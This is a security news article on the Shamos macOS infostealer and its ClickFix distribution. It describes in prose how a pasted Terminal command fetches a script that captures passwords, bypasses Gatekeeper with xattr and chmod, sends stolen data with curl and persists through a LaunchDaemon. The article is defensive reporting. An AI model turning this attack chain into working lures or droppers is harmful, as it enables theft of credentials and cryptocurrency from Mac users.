Mac Means Safe? No. A New Trojan Steals Everything—From Passwords to Cryptocurrency
Hackers have found a new way—they "help" fix your Mac and steal your passwords.
Hackers have found a new way—they "help" fix your Mac and steal your passwords.
Researchers from CrowdStrike have identified a new macOS infection campaign utilizing a malicious program called Shamos. This Trojan is a variant of the Atomic macOS Stealer (AMOS), a known information-stealer for Mac, and is used by the group COOKIE SPIDER. Shamos's primary goal is to steal passwords, keys from the Keychain, Apple Notes, cryptocurrency wallets, and data from browsers.
Since June 2025, Shamos has been detected in over three hundred infection cases worldwide. It is distributed via the ClickFix technique, where attackers provide instructions disguised as tips for fixing errors or configuring the system. The most common lures are advertisements or fake repositories on GitHub. Users are prompted to copy and execute a command in the macOS Terminal, supposedly to resolve issues related to drivers or printer setup. In reality, the command decodes a Base64 URL and downloads a malicious Bash script from a remote server.
The script first intercepts the device owner's password, then downloads the Shamos binary file, removes its quarantine flag using xattr, and makes it executable via chmod, thereby bypassing the Gatekeeper protection mechanism. Upon launch, the malware checks if it's running in a virtual environment and executes a set of AppleScript commands for reconnaissance and system information gathering.
The victim's data is packed into an out.zip archive and sent to the operators' server via curl. If Shamos is launched with administrator privileges, it establishes persistence in the system: it creates a com.finder.helper.plist file in the LaunchDaemons directory to ensure it loads automatically at macOS startup. CrowdStrike notes that the program can download additional modules, including a fake Ledger Live application for managing cryptocurrency wallets and botnet components.
ClickFix attacks are becoming an increasingly common method for malware delivery. They are disguised as CAPTCHAs, Google Meet tips, TikTok videos, and now as "error fixes" for Mac. The technique is so effective that it is used not only by cybercriminal groups but also by state-sponsored actors in their attacks.
macOS users are advised not to execute commands from random instructions found online, especially from advertising links or unverified GitHub repositories. For assistance, it's better to use the system's built-in help (Cmd + Space → Help) or official Apple Community forums where posts are moderated.
